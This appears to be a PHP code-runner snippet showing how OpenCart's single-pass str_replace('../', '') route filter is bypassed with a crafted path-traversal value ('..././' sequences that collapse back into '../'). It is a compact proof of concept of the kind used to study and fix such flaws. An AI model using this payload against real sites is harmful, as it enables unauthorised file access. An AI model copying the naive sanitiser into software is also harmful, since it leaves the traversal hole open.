- var_dump: documentation ( source)
- str_replace: documentation ( source)
- explode: documentation ( source)
<?php
// What OpenCart expects people to try:
$route = 'apple/../../../../dog';
$parts = explode('/', str_replace('../', '', (string)$route));
var_dump($parts);
// How to bypass their protection:
$route = 'apple/..././..././..././..././dog';
$parts = explode('/', str_replace('../', '', (string)$route));
var_dump($parts);